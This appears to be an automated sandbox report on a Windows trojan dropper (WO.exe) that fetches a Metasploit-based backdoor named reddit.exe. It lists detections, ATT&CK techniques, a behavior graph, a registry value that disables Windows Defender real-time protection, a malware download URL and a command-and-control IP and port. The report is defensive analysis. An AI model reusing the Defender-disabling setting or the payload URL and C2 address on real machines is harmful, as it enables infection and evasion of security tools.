                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Disable Windows Defender real time protection (registry)
                                  Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time ProtectionRegistry value created: DisableRealtimeMonitoring 1Jump to behavior

                                  Remote Access Functionality

                                  barindex
                                  Yara detected Metasploit Payload
                                  Source: Yara matchFile source: 53.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 28.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 53.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 27.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 6.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 27.2.reddit.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 28.0.reddit.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\reddit.exe, type: DROPPED
                                  Source: Yara matchFile source: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.2895737974.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001B.00000002.2895620558.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000002.2895573514.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001C.00000002.2895801436.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000006.00000000.1732936032.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001C.00000000.1807451210.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001B.00000002.2895931053.0000000000690000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000035.00000000.2341032369.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001B.00000000.1807295375.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001C.00000002.2895627672.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information11
                                  Scripting                                  		Valid Accounts1
                                  Native API                                  		11
                                  Scripting                                  		1
                                  DLL Side-Loading                                  		3
                                  Disable or Modify Tools                                  		OS Credential Dumping2
                                  File and Directory Discovery                                  		Remote Services1
                                  Archive Collected Data                                  		2
                                  Ingress Tool Transfer                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Command and Scripting Interpreter                                  		1
                                  DLL Side-Loading                                  		1
                                  Bypass User Account Control                                  		1
                                  Deobfuscate/Decode Files or Information                                  		LSASS Memory11
                                  System Information Discovery                                  		Remote Desktop ProtocolData from Removable Media11
                                  Encrypted Channel                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts1
                                  Scheduled Task/Job                                  		11
                                  Windows Service                                  		11
                                  Windows Service                                  		4
                                  Obfuscated Files or Information                                  		Security Account Manager21
                                  Security Software Discovery                                  		SMB/Windows Admin SharesData from Network Shared Drive1
                                  Non-Standard Port                                  		Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts11
                                  Service Execution                                  		1
                                  Scheduled Task/Job                                  		11
                                  Process Injection                                  		2
                                  Software Packing                                  		NTDS1
                                  Process Discovery                                  		Distributed Component Object ModelInput Capture2
                                  Non-Application Layer Protocol                                  		Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud Accounts2
                                  PowerShell                                  		Network Logon Script1
                                  Scheduled Task/Job                                  		1
                                  DLL Side-Loading                                  		LSA Secrets21
                                  Virtualization/Sandbox Evasion                                  		SSHKeylogging3
                                  Application Layer Protocol                                  		Scheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                  Bypass User Account Control                                  		Cached Domain Credentials1
                                  Application Window Discovery                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                  Masquerading                                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                  Modify Registry                                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                                  Virtualization/Sandbox Evasion                                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                                  Process Injection                                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580052 Sample: WO.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 70 f.neko.pe 2->70 76 Found malware configuration 2->76 78 Malicious sample detected (through community Yara rule) 2->78 80 Antivirus detection for URL or domain 2->80 82 10 other signatures 2->82 9 WO.exe 8 2->9         started        12 WO.exe 8 2->12         started        15 WO.exe 8 2->15         started        17 WO.exe 2->17         started        signatures3 process4 file5 62 C:\Users\user\AppData\Local\Temp\...\4784.bat, ASCII 9->62 dropped 19 cmd.exe 4 9->19         started        64 C:\Users\user\AppData\Local\Temp\...\6F7F.bat, ASCII 12->64 dropped 96 Multi AV Scanner detection for dropped file 12->96 98 Machine Learning detection for dropped file 12->98 23 cmd.exe 2 12->23         started        66 C:\Users\user\AppData\Local\Temp\...\703A.bat, ASCII 15->66 dropped 25 cmd.exe 15->25         started        68 C:\Users\user\AppData\Local\Temp\...\481C.bat, ASCII 17->68 dropped 27 cmd.exe 17->27         started        signatures6 process7 file8 56 C:\Users\user\AppData\Roaming\...\WO.exe, PE32+ 19->56 dropped 58 C:\Users\user\...\WO.exe:Zone.Identifier, ASCII 19->58 dropped 84 Suspicious powershell command line found 19->84 86 Uses cmd line tools excessively to alter registry or file data 19->86 88 Tries to download and execute files (via powershell) 19->88 90 Uses schtasks.exe or at.exe to add and modify task schedules 19->90 29 reddit.exe 19->29         started        33 powershell.exe 23 19->33         started        35 powershell.exe 14 16 19->35         started        42 10 other processes 19->42 92 Modifies Windows Defender protection settings 23->92 94 Disables Windows Defender (via service or powershell) 23->94 38 powershell.exe 23->38         started        44 10 other processes 23->44 40 powershell.exe 25->40         started        46 10 other processes 25->46 48 7 other processes 27->48 signatures9 process10 dnsIp11 72 147.185.221.23, 1121, 49731, 49732 SALSGIVERUS United States 29->72 100 Antivirus detection for dropped file 29->100 102 Multi AV Scanner detection for dropped file 29->102 104 Machine Learning detection for dropped file 29->104 106 Loading BitLocker PowerShell Module 33->106 108 Powershell drops PE file 33->108 74 f.neko.pe 185.151.51.214, 443, 49730 A2HOSTINGUS United States 35->74 60 C:\Users\user\AppData\Local\Temp\reddit.exe, PE32 35->60 dropped 110 Disable Windows Defender real time protection (registry) 42->110 50 net1.exe 1 42->50         started        52 net1.exe 44->52         started        54 net1.exe 46->54         started        file12 signatures13 process14

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  WO.exe58%ReversingLabsWin64.Trojan.Boxter
                                  WO.exe100%Joe Sandbox ML

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Users\user\AppData\Local\Temp\reddit.exe100%AviraTR/Patched.Gen2
                                  C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\reddit.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\Temp\reddit.exe89%ReversingLabsWin32.Backdoor.Swrort
                                  C:\Users\user\AppData\Roaming\HiddenScripts\WO.exe58%ReversingLabsWin64.Trojan.Boxter

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  https://f.neko.pe/file/~d35Ci~adCQqRGW0%Avira URL Cloudsafe
                                  https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exe100%Avira URL Cloudmalware
                                  http://www.zeustech.net/0%Avira URL Cloudsafe

                                  Domains and IPs

                                  Contacted Domains

                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  f.neko.pe
                                  		185.151.51.214
                                  		truetrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://f.neko.pe/file/~d35Ci~adCQqRGWGduhs.exetrue
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.apache.org/licenses/LICENSE-2.0reddit.exe, 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 0000001B.00000000.1807381222.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 0000001C.00000002.2895738528.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe, 00000035.00000000.2341086873.0000000000415000.00000002.00000001.01000000.00000005.sdmp, reddit.exe.5.drfalse
                                      		high
                                      https://f.neko.pe/file/~d35Ci~adCQqRGWWO.exetrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.apache.org/reddit.exe.5.drfalse
                                        		high
                                        http://www.zeustech.net/reddit.exe.5.drfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        185.151.51.214
                                        		f.neko.peUnited States
                                        		55293A2HOSTINGUStrue
                                        147.185.221.23
                                        		unknownUnited States
                                        		12087SALSGIVERUStrue

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1580052
                                        Start date and time:2024-12-23 19:53:06 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 6m 35s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:57
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
